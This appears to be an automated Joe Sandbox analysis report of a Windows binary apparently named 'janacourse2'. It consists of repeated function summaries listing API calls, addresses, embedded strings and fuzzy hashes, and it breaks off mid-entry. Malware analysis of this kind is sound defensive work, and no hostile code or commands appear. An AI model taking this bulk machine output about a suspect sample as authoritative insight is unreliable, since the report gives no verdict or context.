                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                            • API String ID: 707087890-567219261
                                                                                                            • Opcode ID: 1abfc9e8a769c206ca23f5d985736cf79983ded89c6c4a6ee2a5c1e12aa5091d
                                                                                                            • Instruction ID: bae8a822edfc28dc62f61076d3113e1f51b205a74666ba1fa50e950a179c98ba
                                                                                                            • Opcode Fuzzy Hash: 1abfc9e8a769c206ca23f5d985736cf79983ded89c6c4a6ee2a5c1e12aa5091d
                                                                                                            • Instruction Fuzzy Hash: 1351C431A001169BCF15EF6CC9508BEB7E9BF94720B2483AAF5A6E7285D735DD40C7A0
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32 ref: 01033774
                                                                                                            • CoUninitialize.OLE32 ref: 0103377F
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0104FB78,?), ref: 010337D9
                                                                                                            • IIDFromString.OLE32(?,?), ref: 0103384C
                                                                                                            • VariantInit.OLEAUT32(?), ref: 010338E4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01033936
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                            • API String ID: 636576611-1287834457
                                                                                                            • Opcode ID: 7ad9863983b68bf227b46c5ac45be4ddba92ca1e40e3d761aba76de239d397db
                                                                                                            • Instruction ID: 7f631f2afbb3b3618427e714c55ea0764ae0b66b6dcbadf35db226759cfda0ff
                                                                                                            • Opcode Fuzzy Hash: 7ad9863983b68bf227b46c5ac45be4ddba92ca1e40e3d761aba76de239d397db
                                                                                                            • Instruction Fuzzy Hash: 80619C74608301AFD321DF54C989BAABBE8BF89714F00085DF9C59B291C774E948CB92
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 010233CF
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 010233F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-3080491070
                                                                                                            • Opcode ID: b305aa55b6487b8a76eddde309553add09eac835ad59fc06d43a6468285c5627
                                                                                                            • Instruction ID: 1e27c79796ca1e095b1125224ff9423b2d1e3714426d4cc16bb2f94801398016
                                                                                                            • Opcode Fuzzy Hash: b305aa55b6487b8a76eddde309553add09eac835ad59fc06d43a6468285c5627
                                                                                                            • Instruction Fuzzy Hash: 1951AF7180021AABDF14EBA1CE42EEEB7B9AF18340F544065F14576051EB3A6F98EF60
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                            • API String ID: 1256254125-769500911
                                                                                                            • Opcode ID: db5cc2f033e14e9ce3333a026d440e6e2570b5a327a8659431f671696be4f246
                                                                                                            • Instruction ID: 344037a81e8ad4996cbbe34c8fae9f490b3d83c2d954e6abbb0ab0502a029b20
                                                                                                            • Opcode Fuzzy Hash: db5cc2f033e14e9ce3333a026d440e6e2570b5a327a8659431f671696be4f246
                                                                                                            • Instruction Fuzzy Hash: E7412932A000268BCB206F7DCC905BEBBF1BF78694B144569E5A1D7289F73DC881C790
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 010253A0
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 01025416
                                                                                                            • GetLastError.KERNEL32 ref: 01025420
                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 010254A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                            • API String ID: 4194297153-14809454
                                                                                                            • Opcode ID: 8bf968f0f3c3e940781094b82272a955aca0e891e095b49871db0132b5152493
                                                                                                            • Instruction ID: 09bcd0a8200c8e2ae209060d5bab76cb7b44dae8602b93fb3a2c901d8677e1d1
                                                                                                            • Opcode Fuzzy Hash: 8bf968f0f3c3e940781094b82272a955aca0e891e095b49871db0132b5152493
                                                                                                            • Instruction Fuzzy Hash: B931A075A002149FE711DF68C984AEABBF4FF45309F048096E946CB292DB75ED46CB90
                                                                                                            APIs
                                                                                                            • CreateMenu.USER32 ref: 01043C79
                                                                                                            • SetMenu.USER32(?,00000000), ref: 01043C88
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01043D10
                                                                                                            • IsMenu.USER32(?), ref: 01043D24
                                                                                                            • CreatePopupMenu.USER32 ref: 01043D2E
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01043D5B
                                                                                                            • DrawMenuBar.USER32 ref: 01043D63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                            • String ID: 0$F
                                                                                                            • API String ID: 161812096-3044882817
                                                                                                            • Opcode ID: 80e646026f6307c884699bf949e28201bb044dfb89809b3146799fdf846f1287
                                                                                                            • Instruction ID: 4f3265965213ce97a016f897a0070f44530edacb5266dcc77e4e031b1141f351
                                                                                                            • Opcode Fuzzy Hash: 80e646026f6307c884699bf949e28201bb044dfb89809b3146799fdf846f1287
                                                                                                            • Instruction Fuzzy Hash: BD418DB8A01219AFEB24DF64E984A9E7BF5FF49310F040068FAC69B350D735A910CF94
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01043A9D
                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01043AA0
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01043AC7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01043AEA
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01043B62
                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01043BAC
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01043BC7
                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 01043BE2
                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01043BF6
                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 01043C13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 312131281-0
                                                                                                            • Opcode ID: efbd51dd73f3366a9a2f20f8aa8b1f22ab6d884532d08f3d0fc6daf648529621
                                                                                                            • Instruction ID: 1579072107cc0897af28ddc8dbca7ca3ed0a787975245045b42f99abb18caf7f
                                                                                                            • Opcode Fuzzy Hash: efbd51dd73f3366a9a2f20f8aa8b1f22ab6d884532d08f3d0fc6daf648529621
                                                                                                            • Instruction Fuzzy Hash: 7D6159B5900218AFDB20DFA8CC81EEE77F8BF09700F1041A9EA95AB291C774A945DB50
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0101B151
                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B165
                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0101B16C
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B17B
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101B18D
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B1A6
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B1B8
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B1FD
                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B212
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B21D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2156557900-0
                                                                                                            • Opcode ID: 6ed0f184e855777b9a56b2332480f1bd168422173e8dd34e4a03273094b0895d
                                                                                                            • Instruction ID: 52e850520752afe0b3c44dd1b9ffeb3076f4ea892b1538d785d3e21a038d242c
                                                                                                            • Opcode Fuzzy Hash: 6ed0f184e855777b9a56b2332480f1bd168422173e8dd34e4a03273094b0895d
                                                                                                            • Instruction Fuzzy Hash: 0A31F5B5100604BFEB359F68D994FAD7BB9BB95711F108044FAC0CA188C7BDD8018F20
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FE2C94
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FE2CA0
                                                                                                            • _free.LIBCMT ref: 00FE2CAB
                                                                                                            • _free.LIBCMT ref: 00FE2CB6
                                                                                                            • _free.LIBCMT ref: 00FE2CC1
                                                                                                            • _free.LIBCMT ref: 00FE2CCC
                                                                                                            • _free.LIBCMT ref: 00FE2CD7
                                                                                                            • _free.LIBCMT ref: 00FE2CE2
                                                                                                            • _free.LIBCMT ref: 00FE2CED
                                                                                                            • _free.LIBCMT ref: 00FE2CFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: acee691b7dff52a68b8ec3917334d22aa886d9ab1f50b593634eaa98bb948c8e
                                                                                                            • Instruction ID: 84606fcfc17b61cd01b7b8bd839f31c9fd2f53774bdb59127380fe9b30c41a78
                                                                                                            • Opcode Fuzzy Hash: acee691b7dff52a68b8ec3917334d22aa886d9ab1f50b593634eaa98bb948c8e
                                                                                                            • Instruction Fuzzy Hash: 7811C67610014CAFCB82EF5ADC42CDD3BB9FF05350F425490F9485B222E639EA50BB91
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FB1459
                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00FB14F8
                                                                                                            • UnregisterHotKey.USER32(?), ref: 00FB16DD
                                                                                                            • DestroyWindow.USER32(?), ref: 00FF24B9
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00FF251E
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF254B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                            • String ID: close all
                                                                                                            • API String ID: 469580280-3243417748
                                                                                                            • Opcode ID: 4a36c5b30f86e0958cf42e24c6f797511ba54d83f739e69ac706cb2dfb418310
                                                                                                            • Instruction ID: 7c9b9b19b913af0a14a7eabb4c3c2479231597fb8f4e303f563b4d915a34ea99
                                                                                                            • Opcode Fuzzy Hash: 4a36c5b30f86e0958cf42e24c6f797511ba54d83f739e69ac706cb2dfb418310
                                                                                                            • Instruction Fuzzy Hash: 73D1C231702212CFDB29EF15C9A9B69F7A1BF05710F5841ADE54AAB261CB34EC12EF50
                                                                                                            APIs
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01027FAD
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01027FC1
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 01027FEB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 01028005
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028017
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028060
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 010280B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 769691225-438819550
                                                                                                            • Opcode ID: 0ca43ab246d35a145c8fa4c2d29e8a381e92118b8867db6bd5580a7e8e41faa2
                                                                                                            • Instruction ID: 2e349e69ef1395d745b00b4b663212f5cd725403fe0b498afc28bc4d7ef5533d
                                                                                                            • Opcode Fuzzy Hash: 0ca43ab246d35a145c8fa4c2d29e8a381e92118b8867db6bd5580a7e8e41faa2
                                                                                                            • Instruction Fuzzy Hash: 0881C2725043119BDB64EF18C8849AEB7E8BF98310F148C5EF9C5C7251E739E945CBA2
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00FB5C7A
                                                                                                              • Part of subcall function 00FB5D0A: GetClientRect.USER32(?,?), ref: 00FB5D30
                                                                                                              • Part of subcall function 00FB5D0A: GetWindowRect.USER32(?,?), ref: 00FB5D71
                                                                                                              • Part of subcall function 00FB5D0A: ScreenToClient.USER32(?,?), ref: 00FB5D99
                                                                                                            • GetDC.USER32 ref: 00FF46F5
                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FF4708
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00FF4716
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00FF472B
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00FF4733
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FF47C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                            • String ID: U
                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                            • Opcode ID: 16883055be64d7cdea2924965c37357583419feed9a58c1cbf25ee7d0529f3a3
                                                                                                            • Instruction ID: f95c2f794b3199f8309eac597c0f52e84cb6eaa9a65b95b055d486045819d1e9
                                                                                                            • Opcode Fuzzy Hash: 16883055be64d7cdea2924965c37357583419feed9a58c1cbf25ee7d0529f3a3
                                                                                                            • Instruction Fuzzy Hash: B971F376800209DFCF219F64C984AFB7BB2FF4A364F144269EE919A179C335A841EF50
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 010235E4
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • LoadStringW.USER32(01082390,?,00000FFF,?), ref: 0102360A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-2391861430
                                                                                                            • Opcode ID: 66640b43dbacd23bf60456edb9ff3308bfd62675ef4662728dec144211a0fd91
                                                                                                            • Instruction ID: 7a7056087d6932037015b2adaac1e9281d33fe925db0ddabd15fba86aba58a04
                                                                                                            • Opcode Fuzzy Hash: 66640b43dbacd23bf60456edb9ff3308bfd62675ef4662728dec144211a0fd91
                                                                                                            • Instruction Fuzzy Hash: 8A51A071C0021ABBDF24EBA1CC82EEEBB79BF14300F544165F24576051DB395A99EFA0
                                                                                                            APIs
                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102C272
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102C29A
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102C2CA
                                                                                                            • GetLastError.KERNEL32 ref: 0102C322
                                                                                                            • SetEvent.KERNEL32(?), ref: 0102C336
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0102C341
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
